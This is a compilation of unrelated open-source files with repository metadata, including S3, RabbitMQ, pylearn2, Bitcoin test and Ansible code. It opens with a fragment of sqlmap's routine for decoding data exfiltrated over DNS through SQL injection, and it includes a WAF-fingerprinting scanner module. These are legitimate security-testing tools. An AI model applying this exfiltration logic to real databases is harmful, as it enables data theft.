if _:
_ = extractRegexResult("%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I)
_ = decodeHexValue(_)
output = (output or "") + _
offset += len(_)
if len(_) < chunk_length:
break
else:
break
kb.dnsMode = False
if output is not None:
retVal = output
if kb.dnsTest is not None:
dataToStdout("[%s] [INFO] %s: %s\r\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))
if count > 0:
hashDBWrite(expression, output)
if not kb.bruteMode:
debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start))
logger.debug(debugMsg)
elif conf.dnsName:
warnMsg = "DNS data exfiltration method through SQL injection "
warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms()
singleTimeWarnMessage(warnMsg)
return safecharencode(retVal) if kb.safeCharEncode else retVal
|
golismero/golismero
|
tools/sqlmap/lib/techniques/dns/use.py
|
Python
|
gpl-2.0
| 4,536
|
from boto.s3.connection import S3Connection as Connection
from tornado.options import options
def S3Connection():
kwargs = {}
if options.aws_port and options.aws_host:
kwargs['host'] = options.aws_host
kwargs['port'] = options.aws_port
# if we're using a custom AWS host/port, disable
# SSL, since fakes3 doesn't support it
kwargs['is_secure'] = False
return Connection(
options.aws_key,
options.aws_secret,
**kwargs)
def S3Bucket():
# if we're testing, then just auto-create a bucket if it doesn't exist already
if options.aws_bucket.endswith("-dev") or options.aws_bucket.endswith("-testing"):
return S3Connection().create_bucket(options.aws_bucket)
else:
return S3Connection().get_bucket(options.aws_bucket)
|
spaceninja/mltshp
|
lib/s3.py
|
Python
|
mpl-2.0
| 820
|
Import("projenv")
import subprocess
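# placeholder version string, used when the git command fails or is unavailable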
version = "git-cmd-not-available"
try:
    version = subprocess.check_output(["git", "describe"]).strip()
except (subprocess.CalledProcessError, OSError):
    pass
projenv.Append(CCFLAGS=["-DKBOX_VERSION=\"\\\"{}\\\"\"".format(version)])
|
sarfata/kbox-firmware
|
tools/platformio_cfg_gitversion.py
|
Python
|
gpl-3.0
| 236
|
#!/usr/bin/env python
import pika
import sys
credentials = pika.PlainCredentials('admin', 'admin')
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='localhost',
port=5672,
virtual_host='/',
credentials=credentials))
channel = connection.channel()
channel.exchange_declare(exchange='my_exchange',
exchange_type='fanout',
durable=True)
message = ' '.join(sys.argv[1:]) or "Tchêlinux"
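# note: a fanout exchange broadcasts to every queue bound to it, so the (empty)
# routing_key below is ignored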
channel.basic_publish(exchange='my_exchange',
routing_key='',
body=message)
print(" [x] Sent %r" % message)
connection.close()
|
joelmir/tornado-simple-api
|
publisher.py
|
Python
|
mit
| 643
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Spaghetti: Web Application Security Scanner
#
# @url: https://github.com/m4ll0k/Spaghetti
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'doc/LICENSE'
import re
class Radware():
@staticmethod
def Run(headers):
        try:
            for item in headers.items():
                if re.search(r'X-SL-CompState', item[0], re.I) is not None:
                    return "AppWall Web Application Firewall (Radware)"
        except Exception, ERROR:
            print ERROR
|
Yukinoshita47/Yuki-Chan-The-Auto-Pentest
|
Module/Spaghetti/modules/fingerprints/waf/radware.py
|
Python
|
mit
| 602
|
"""
A Pylearn2 Dataset class for accessing the data for the
facial expression recognition Kaggle contest for the ICML
2013 workshop on representation learning.
"""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2013, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
import csv
import numpy as np
import os
from pylearn2.datasets.dense_design_matrix import DefaultViewConverter
from pylearn2.datasets.dense_design_matrix import DenseDesignMatrix
from pylearn2.utils.string_utils import preprocess
class EmotionsDataset(DenseDesignMatrix):
"""
A Pylearn2 Dataset class for accessing the data for the
facial expression recognition Kaggle contest for the ICML
2013 workshop on representation learning.
"""
def __init__(self, which_set,
base_path = '${PYLEARN2_DATA_PATH}/icml_2013_emotions',
start = None,
stop = None,
preprocessor = None,
fit_preprocessor = False,
axes = ('b', 0, 1, 'c'),
fit_test_preprocessor = False):
"""
which_set: A string specifying which portion of the dataset
to load. Valid values are 'train' or 'public_test'
base_path: The directory containing the .csv files from kaggle.com.
This directory should be writable; if the .csv files haven't
already been converted to npy, this class will convert them
to save memory the next time they are loaded.
fit_preprocessor: True if the preprocessor is allowed to fit the
data.
fit_test_preprocessor: If we construct a test set based on this
dataset, should it be allowed to fit the test set?
"""
self.test_args = locals()
self.test_args['which_set'] = 'public_test'
self.test_args['fit_preprocessor'] = fit_test_preprocessor
del self.test_args['start']
del self.test_args['stop']
del self.test_args['self']
files = {'train': 'train.csv', 'public_test' : 'test.csv'}
try:
filename = files[which_set]
except KeyError:
raise ValueError("Unrecognized dataset name: " + which_set)
path = base_path + '/' + filename
path = preprocess(path)
X, y = self._load_data(path, which_set == 'train')
if start is not None:
assert which_set != 'test'
assert isinstance(start, int)
assert isinstance(stop, int)
assert start >= 0
assert start < stop
assert stop <= X.shape[0]
X = X[start:stop, :]
if y is not None:
y = y[start:stop, :]
view_converter = DefaultViewConverter(shape=[48,48,1], axes=axes)
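        # 48x48 grayscale images; the contest data defines seven emotion
        # classes, hence y_labels=7 below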
super(EmotionsDataset, self).__init__(X=X, y=y, y_labels=7, view_converter=view_converter)
if preprocessor:
preprocessor.apply(self, can_fit=fit_preprocessor)
def adjust_for_viewer(self, X):
return (X - 127.5) / 127.5
def get_test_set(self):
return EmotionsDataset(**self.test_args)
def _load_data(self, path, expect_labels):
assert path.endswith('.csv')
# If a previous call to this method has already converted
# the data to numpy format, load the numpy directly
X_path = path[:-4] + '.X.npy'
Y_path = path[:-4] + '.Y.npy'
if os.path.exists(X_path):
X = np.load(X_path)
if expect_labels:
y = np.load(Y_path)
else:
y = None
return X, y
# Convert the .csv file to numpy
csv_file = open(path, 'r')
reader = csv.reader(csv_file)
# Discard header
row = reader.next()
y_list = []
X_list = []
for row in reader:
if expect_labels:
y_str, X_row_str = row
y = int(y_str)
y_list.append(y)
else:
                X_row_str, = row
X_row_strs = X_row_str.split(' ')
X_row = map(lambda x: float(x), X_row_strs)
X_list.append(X_row)
X = np.asarray(X_list).astype('float32')
if expect_labels:
y = np.asarray(y_list)
else:
y = None
np.save(X_path, X)
if y is not None:
np.save(Y_path, y)
return X, y
|
cosmoharrigan/pylearn2
|
pylearn2/scripts/icml_2013_wrepl/emotions/emotions_dataset.py
|
Python
|
bsd-3-clause
| 4,476
|
#!/usr/bin/env python3
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Copyright (c) 2015-2017 The Bitcoin Unlimited developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import pdb
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
# Create one-input, one-output, no-fee transaction:
class RawTransactionsTest(BitcoinTestFramework):
def setup_chain(self, bitcoinConfDict=None, wallets=None):
print(("Initializing test directory "+self.options.tmpdir))
initialize_chain_clean(self.options.tmpdir, 4, bitcoinConfDict, wallets)
def setup_network(self, split=False):
self.nodes = start_nodes(4, self.options.tmpdir)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
connect_nodes_bi(self.nodes,0,3)
self.is_network_split=False
self.sync_all()
def run_test(self):
print("Mining blocks...")
min_relay_tx_fee = self.nodes[0].getnetworkinfo()['relayfee']
# This test is not meant to test fee estimation and we'd like
# to be sure all txs are sent at a consistent desired feerate
for node in self.nodes:
node.settxfee(min_relay_tx_fee)
# if the fee's positive delta is higher than this value tests will fail,
# neg. delta always fail the tests.
# The size of the signature of every input may be at most 2 bytes larger
# than a minimum sized signature.
# = 2 bytes * minRelayTxFeePerByte
feeTolerance = 2 * min_relay_tx_fee/1000
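        # (relayfee is quoted per kB, so min_relay_tx_fee/1000 is the per-byte rate)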
self.nodes[2].generate(1)
self.sync_all()
self.nodes[0].generate(121)
self.sync_all()
watchonly_address = self.nodes[0].getnewaddress()
watchonly_pubkey = self.nodes[0].validateaddress(watchonly_address)["pubkey"]
watchonly_amount = Decimal(200)
self.nodes[3].importpubkey(watchonly_pubkey, "", True)
watchonly_txid = self.nodes[0].sendtoaddress(watchonly_address, watchonly_amount)
self.nodes[0].sendtoaddress(self.nodes[3].getnewaddress(), watchonly_amount / 10)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.5)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 5.0)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
###############
# simple test #
###############
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
        assert(len(dec_tx['vin']) > 0) #test if we have enough inputs
#############################
# test preserving nLockTime #
#############################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs,1234)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(dec_tx["locktime"] == 1234)
################################
# test using default nLockTime #
################################
blockcount = self.nodes[0].getblockcount()
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
# there's a random chance of an earlier locktime so iterate a few times
for i in range(0,20):
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
if dec_tx["locktime"] == blockcount:
break
assert(dec_tx["locktime"] > 0)
        assert(i<18) # incredibly unlikely to never produce the current blockcount
##############################
# simple test with two coins #
##############################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.2 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(len(dec_tx['vin']) > 0) #test if we have enough inputs
##############################
# simple test with two coins #
##############################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.6 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(len(dec_tx['vin']) > 0)
assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '')
################################
# simple test with two outputs #
################################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.6, self.nodes[1].getnewaddress() : 2.5 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert(len(dec_tx['vin']) > 0)
assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '')
#########################################################################
# test a fundrawtransaction with a VIN greater than the required amount #
#########################################################################
utx = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 5.0:
utx = aUtx
break
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert_equal(fee + totalOut, utx['amount']) #compare vin total and totalout+fee
#####################################################################
        # test a fundrawtransaction which will not get a change output      #
#####################################################################
utx = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 5.0:
utx = aUtx
break
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : Decimal(5.0) - fee } # - feeTolerance } # BU having the fee tolerance in there creates a very small change output
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
txfee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert_equal(rawtxfund['changepos'], -1)
assert_equal(txfee + totalOut, utx['amount']) #compare vin total and totalout+fee
#########################################################################
# test a fundrawtransaction with a VIN smaller than the required amount #
#########################################################################
utx = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 1.0:
utx = aUtx
break
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
# 4-byte version + 1-byte vin count + 36-byte prevout then script_len
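        # (4+1+36) bytes = 41 bytes = 82 hex chars, so rawtx[82:84] is the
        # 1-byte script length; "0100" swaps in length 0x01 plus a single
        # 0x00 scriptSig byte (checked by the assertion below)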
rawtx = rawtx[:82] + "0100" + rawtx[84:]
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for i, out in enumerate(dec_tx['vout']):
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
else:
assert_equal(i, rawtxfund['changepos'])
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex'])
assert_equal(matchingOuts, 1)
assert_equal(len(dec_tx['vout']), 2)
###########################################
# test a fundrawtransaction with two VINs #
###########################################
utx = False
utx2 = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 1.0:
utx = aUtx
if aUtx['amount'] == 5.0:
utx2 = aUtx
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ]
outputs = { self.nodes[0].getnewaddress() : 6.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for out in dec_tx['vout']:
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
assert_equal(matchingOuts, 1)
assert_equal(len(dec_tx['vout']), 2)
matchingIns = 0
for vinOut in dec_tx['vin']:
for vinIn in inputs:
if vinIn['txid'] == vinOut['txid']:
matchingIns+=1
assert_equal(matchingIns, 2) #we now must see two vins identical to vins given as params
#########################################################
# test a fundrawtransaction with two VINs and two vOUTs #
#########################################################
utx = False
utx2 = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 1.0:
utx = aUtx
if aUtx['amount'] == 5.0:
utx2 = aUtx
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ]
outputs = { self.nodes[0].getnewaddress() : 6.0, self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for out in dec_tx['vout']:
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
assert_equal(matchingOuts, 2)
assert_equal(len(dec_tx['vout']), 3)
##############################################
# test a fundrawtransaction with invalid vin #
##############################################
listunspent = self.nodes[2].listunspent()
inputs = [ {'txid' : "1c7f966dab21119bac53213a2bc7532bff1fa844c124fd750a7d0b1332440bd1", 'vout' : 0} ] #invalid vin!
outputs = { self.nodes[0].getnewaddress() : 1.0}
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
try:
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
raise AssertionError("Spent more than available")
except JSONRPCException as e:
assert("Insufficient" in e.error['message'])
############################################################
#compare fee of a standard pubkeyhash transaction
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a standard pubkeyhash transaction with multiple outputs
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1,self.nodes[1].getnewaddress():1.2,self.nodes[1].getnewaddress():0.1,self.nodes[1].getnewaddress():1.3,self.nodes[1].getnewaddress():0.2,self.nodes[1].getnewaddress():0.3}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendmany("", outputs)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a 2of2 multisig p2sh transaction
# create 2of2 addr
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[1].getnewaddress()
addr1Obj = self.nodes[1].validateaddress(addr1)
addr2Obj = self.nodes[1].validateaddress(addr2)
mSigObj = self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])
inputs = []
outputs = {mSigObj:1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(mSigObj, 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a standard pubkeyhash transaction
# create 4of5 addr
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[1].getnewaddress()
addr3 = self.nodes[1].getnewaddress()
addr4 = self.nodes[1].getnewaddress()
addr5 = self.nodes[1].getnewaddress()
addr1Obj = self.nodes[1].validateaddress(addr1)
addr2Obj = self.nodes[1].validateaddress(addr2)
addr3Obj = self.nodes[1].validateaddress(addr3)
addr4Obj = self.nodes[1].validateaddress(addr4)
addr5Obj = self.nodes[1].validateaddress(addr5)
mSigObj = self.nodes[1].addmultisigaddress(4, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey'], addr4Obj['pubkey'], addr5Obj['pubkey']])
inputs = []
outputs = {mSigObj:1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(mSigObj, 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
# spend a 2of2 multisig transaction over fundraw
# create 2of2 addr
addr1 = self.nodes[2].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].validateaddress(addr1)
addr2Obj = self.nodes[2].validateaddress(addr2)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])
# send 1.2 BTC to msig addr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.nodes[1].generate(1)
self.sync_all()
oldBalance = self.nodes[1].getbalance()
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1}
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[2].fundrawtransaction(rawTx)
signedTx = self.nodes[2].signrawtransaction(fundedTx['hex'])
txId = self.nodes[2].sendrawtransaction(signedTx['hex'])
self.sync_all()
self.nodes[1].generate(1)
self.sync_all()
# make sure funds are received at node1
assert_equal(oldBalance+Decimal('1.10000000'), self.nodes[1].getbalance())
############################################################
# locked wallet test
self.nodes[1].encryptwallet("test")
self.nodes.pop(1)
stop_nodes(self.nodes)
wait_bitcoinds()
self.nodes = start_nodes(4, self.options.tmpdir)
# This test is not meant to test fee estimation and we'd like
# to be sure all txs are sent at a consistent desired feerate
for node in self.nodes:
node.settxfee(min_relay_tx_fee)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
connect_nodes_bi(self.nodes,0,3)
self.is_network_split=False
self.sync_all()
# drain the keypool
self.nodes[1].getnewaddress()
inputs = []
outputs = {self.nodes[0].getnewaddress():1.1}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
# fund a transaction that requires a new key for the change output
# creating the key must be impossible because the wallet is locked
try:
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
raise AssertionError("Wallet unlocked without passphrase")
except JSONRPCException as e:
assert('Keypool ran out' in e.error['message'])
#refill the keypool
self.nodes[1].walletpassphrase("test", 100)
self.nodes[1].walletlock()
try:
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1.2)
raise AssertionError("Wallet unlocked without passphrase")
except JSONRPCException as e:
assert('walletpassphrase' in e.error['message'])
oldBalance = self.nodes[0].getbalance()
inputs = []
outputs = {self.nodes[0].getnewaddress():1.1}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
#now we need to unlock
self.nodes[1].walletpassphrase("test", 100)
signedTx = self.nodes[1].signrawtransaction(fundedTx['hex'])
txId = self.nodes[1].sendrawtransaction(signedTx['hex'])
self.sync_all()
self.nodes[1].generate(1)
self.sync_all()
        # make sure funds are received at node0
assert_equal(oldBalance+Decimal('51.10000000'), self.nodes[0].getbalance())
###############################################
# multiple (~19) inputs tx test | Compare fee #
###############################################
#empty node1, send some small coins from node0 to node1
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
for i in range(0,20):
self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
#fund a tx with ~20 small inputs
inputs = []
outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[1].sendmany("", outputs)
signedFee = self.nodes[1].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance*19) #~19 inputs
#############################################
# multiple (~19) inputs tx test | sign/send #
#############################################
#again, empty node1, send some small coins from node0 to node1
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
for i in range(0,20):
self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
#fund a tx with ~20 small inputs
oldBalance = self.nodes[0].getbalance()
inputs = []
outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
fundedAndSignedTx = self.nodes[1].signrawtransaction(fundedTx['hex'])
txId = self.nodes[1].sendrawtransaction(fundedAndSignedTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(oldBalance+Decimal('50.19000000'), self.nodes[0].getbalance()) #0.19+block reward
#####################################################
# test fundrawtransaction with OP_RETURN and no vin #
#####################################################
rawtx = "0100000000010000000000000000066a047465737400000000"
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(len(dec_tx['vin']), 0)
assert_equal(len(dec_tx['vout']), 1)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert_greater_than(len(dec_tx['vin']), 0) # at least one vin
assert_equal(len(dec_tx['vout']), 2) # one change output added
##################################################
# test a fundrawtransaction using only watchonly #
##################################################
inputs = []
outputs = {self.nodes[2].getnewaddress() : watchonly_amount / 2}
rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
result = self.nodes[3].fundrawtransaction(rawtx, True)
res_dec = self.nodes[0].decoderawtransaction(result["hex"])
assert_equal(len(res_dec["vin"]), 1)
assert_equal(res_dec["vin"][0]["txid"], watchonly_txid)
assert("fee" in result.keys())
assert_greater_than(result["changepos"], -1)
###############################################################
# test fundrawtransaction using the entirety of watched funds #
###############################################################
inputs = []
outputs = {self.nodes[2].getnewaddress() : watchonly_amount}
rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
result = self.nodes[3].fundrawtransaction(rawtx, True)
res_dec = self.nodes[0].decoderawtransaction(result["hex"])
assert_equal(len(res_dec["vin"]), 2)
assert(res_dec["vin"][0]["txid"] == watchonly_txid or res_dec["vin"][1]["txid"] == watchonly_txid)
assert_greater_than(result["fee"], 0)
assert_greater_than(result["changepos"], -1)
assert_equal(result["fee"] + res_dec["vout"][result["changepos"]]["value"], watchonly_amount / 10)
signedtx = self.nodes[3].signrawtransaction(result["hex"])
assert(not signedtx["complete"])
signedtx = self.nodes[0].signrawtransaction(signedtx["hex"])
assert(signedtx["complete"])
self.nodes[0].sendrawtransaction(signedtx["hex"])
self.nodes[0].generate(1)
self.sync_all()
################################
# Test no address reuse occurs #
################################
inputs = []
outputs = {self.nodes[2].getnewaddress() : 1}
rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
result3 = self.nodes[3].fundrawtransaction(rawtx)
res_dec = self.nodes[0].decoderawtransaction(result3["hex"])
changeaddress = ""
for out in res_dec['vout']:
if out['value'] > 1.0:
changeaddress += out['scriptPubKey']['addresses'][0]
assert(changeaddress != "")
nextaddr = self.nodes[3].getnewaddress()
# Now the change address key should be removed from the keypool
assert(changeaddress != nextaddr)
if __name__ == '__main__':
RawTransactionsTest().main(None,{"keypool":1})
|
Bitcoin-com/BUcash
|
qa/rpc-tests/fundrawtransaction.py
|
Python
|
mit
| 27,687
|
# ----------------------------------------------------------------
# Copyright 2016 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------
""" providers.py
Service Providers module. Current implementation supports the NetconfServiceProvider which
uses ncclient (a Netconf client library) to provide CRUD services.
"""
import logging
from .provider import ServiceProvider
from .netconf_provider import NetconfServiceProvider
from .native_netconf_provider import NativeNetconfServiceProvider
from .codec_provider import CodecServiceProvider
logging.getLogger('ydk').addHandler(logging.NullHandler())
|
111pontes/ydk-py
|
core/ydk/providers/__init__.py
|
Python
|
apache-2.0
| 1,187
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Ansible module to manage A10 Networks slb service-group objects
(c) 2014, Mischa Peters <mpeters@a10networks.com>
This file is part of Ansible
Ansible is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Ansible is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
